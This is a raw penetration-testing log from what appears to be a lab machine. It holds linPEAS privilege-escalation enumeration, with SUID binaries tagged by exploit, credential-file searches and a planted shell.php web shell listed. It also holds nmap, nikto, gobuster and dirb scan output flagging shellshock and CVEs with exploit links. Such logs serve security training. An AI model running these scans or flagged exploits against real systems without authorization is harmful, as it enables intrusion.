/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Sep 13 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 May 29 2020 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul 28 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Jul 27 2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 18 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 14 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Aug 13 2021 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Aug 13 2021 /usr/share/php7.4-common/common/ftp.ini
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 vmadmin vmadmin 3818 Sep 13 2021 /home/vmadmin/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 vmadmin vmadmin 807 Jun 27 2020 /home/vmadmin/.profile
-rw-r--r-- 1 vmadmin vmadmin 0 Jun 27 2020 /home/vmadmin/.sudo_as_admin_successful
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K May 26 2021 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 9 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 39K Jul 21 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 55K Jul 21 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 67K Jul 21 2020 /usr/bin/su
-rwsr-xr-x 1 root root 31K May 26 2021 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 15K Jan 29 2020 /usr/lib/mc/cons.saver
-rwxr-sr-x 1 root shadow 83K May 28 2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 35K Jul 21 2020 /usr/bin/wall
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 343K Mar 9 2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K May 28 2020 /usr/bin/expiry
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3222 Mar 11 2020 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man
-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-20+22:19:01.0447607530 /var/www/html/linpeas.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-screen.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-ksconfig.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/set-bashrc.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/search-ubuntu-item.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/clean-vm-ubuntu.sh
2021-07-10+10:40:46.7196913020 /usr/local/smartlearn/bin/calc-ipaddr.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_terminal.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_keyboard.sh
2021-06-21+18:37:59.5486618140 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in root
/swapfile
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 24
drwxr-xr-x 2 root root 4096 Jul 10 2021 .
drwxr-xr-x 82 root root 4096 Sep 13 2021 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 2 root root 339 Jul 10 2021 add-bashrc.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/html
/var/www/html/index.php
/var/www/html/index.html
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/syslog
/var/log/journal/0291f50a03464de4ba0dcf51a3f92c75/system.journal
/var/log/vsftpd.log
/var/log/auth.log
/var/log/kern.log
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
/home/vmadmin/.bash_logout
/home/vmadmin/.hushlogin
/home/vmadmin/.selected_editor
/home/vmadmin/.sudo_as_admin_successful
/home/vmadmin/.bashrc
/home/vmadmin/.bash_history
/home/vmadmin/bashrc.tmp
/home/vmadmin/.profile
/var/www/html/index.php
/var/www/html/linpeas.sh
/var/www/html/index.html
/var/www/html/shell.php
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 568 Sep 13 2021 /usr/local/smartlearn/bin/ksconfig.bak
-rw-r--r-- 1 root root 2544 Jul 22 2020 /usr/share/help-langpack/en_GB/evolution/backup-restore.page
-rw-r--r-- 1 root root 1059 Jun 16 2020 /usr/share/help-langpack/en_GB/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 840 Jun 16 2020 /usr/share/help-langpack/en_GB/deja-dup/backup-first.page
-rw-r--r-- 1 root root 1059 Jun 16 2020 /usr/share/help-langpack/en_AU/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 840 Jun 16 2020 /usr/share/help-langpack/en_AU/deja-dup/backup-first.page
-rw-r--r-- 1 root root 11401 Jul 10 2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 9073 May 8 2021 /usr/lib/modules/5.4.0-74-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 May 8 2021 /usr/lib/modules/5.4.0-74-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 44048 Mar 17 2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-74/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 237862 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/.config.old
-rw-r--r-- 1 root root 0 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 May 8 2021 /usr/src/linux-headers-5.4.0-74-generic/include/config/wm831x/backup.h
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Sep 13 2021 .
drwxr-xr-x 12 root root 4.0K Sep 13 2021 ..
drwxrwxrwx 2 root root 4.0K Nov 20 22:19 html
/var/www/html:
total 836K
drwxrwxrwx 2 root root 4.0K Nov 20 22:19 .
drwxr-xr-x 3 root root 4.0K Sep 13 2021 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Jun 27 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 vmadmin vmadmin 220 Jun 27 2020 /home/vmadmin/.bash_logout
-rw-rw-r-- 1 vmadmin vmadmin 0 Jun 27 2020 /home/vmadmin/.hushlogin
-rw-rw-r-- 1 vmadmin vmadmin 66 Jun 3 2021 /home/vmadmin/.selected_editor
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 501 May 4 2021 /var/backups/apt.extended_states.5.gz
-rw-r--r-- 1 root root 172 Sep 13 2021 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.6.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 7528 Sep 13 2021 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.4.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.5.gz
-rw-r--r-- 1 root root 101410 Sep 7 2020 /var/backups/dpkg.status.4.gz
-rw-r--r-- 1 root root 746 Jul 10 2021 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 11 Jun 27 2020 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 480 Sep 7 2020 /var/backups/apt.extended_states.6.gz
-rw-r--r-- 1 root root 2243 Apr 14 2021 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 106784 Jun 3 2021 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 490 May 4 2021 /var/backups/apt.extended_states.4.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.1.gz
-rw-r--r-- 1 root root 2235 Jul 7 2020 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 356 Sep 13 2021 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 491071 Sep 13 2021 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 105217 Jul 2 2020 /var/backups/dpkg.status.6.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 101862 Apr 21 2021 /var/backups/dpkg.status.3.gz
-rw-r--r-- 1 root root 658 Jun 3 2021 /var/backups/apt.extended_states.3.gz
-rw-r--r-- 1 root root 2251 May 4 2021 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 105476 Jul 6 2020 /var/backups/dpkg.status.5.gz
-rw-r--r-- 1 root root 2053 Jun 30 2020 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 101735 May 4 2021 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 51200 Sep 14 2021 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 811 Sep 13 2021 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 126 Jun 27 2020 /var/backups/dpkg.diversions.3.gz
-rw-r--r-- 1 root root 120 Jun 27 2020 /var/backups/dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 43 Jun 27 2020 /var/backups/dpkg.arch.3.gz
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/issue
/etc/issue.dpkg-dist
/etc/motd
/run/lock
/run/lock/apache2
/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html
/var/www/html/linpeas.sh
/var/www/html/shell.php
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/help-langpack/en_GB/empathy/irc-nick-password.page
/usr/share/help-langpack/en_GB/evince/password.page
/usr/share/help-langpack/en_GB/zenity/password.page
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
[ 1.799147] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[ 1.799166] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 2.293006] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[ 2.293090] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.135 -oA machines/192_168_110_135/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:44 CET
Nmap scan report for 192.168.110.135
Host is up (0.0017s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=22%CT=1%CU=30833%PV=Y%DS=2%DC=I%G=Y%TM=6378B3
OS:A1%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS(O1=
OS:M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7
OS:%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y
OS:%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.87 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.135 -oA machines/192_168_110_135/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Nmap scan report for 192.168.110.135
Host is up (0.00080s latency).
All 1000 scanned ports on 192.168.110.135 are closed (937) or open|filtered (63)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1011.70 seconds
nikto -h 192.168.110.135
---------------------------------------------------------------------------
+ Target IP: 192.168.110.135
+ Target Hostname: 192.168.110.135
+ Target Port: 80
+ Start Time: 2022-12-11 07:11:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: 4d0, size: 5cbedd7725b09, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-112004: /cgi-bin/printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ 8727 requests: 2 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-12-11 07:11:40 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.135 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:12:24 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/cgi-bin/ (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 1232]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/12/11 07:12:25 Finished
===============================================================
dirb http://192.168.110.135 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:13:10 2022
URL_BASE: http://192.168.110.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.135/ ----
+ http://192.168.110.135/index.html (CODE:200|SIZE:1232)
-----------------
END_TIME: Sun Dec 11 07:13:13 2022
DOWNLOADED: 9224 - FOUND: 1
sudo nmap 192.168.110.135 -sV -oA 192_168_110_135/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.135
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
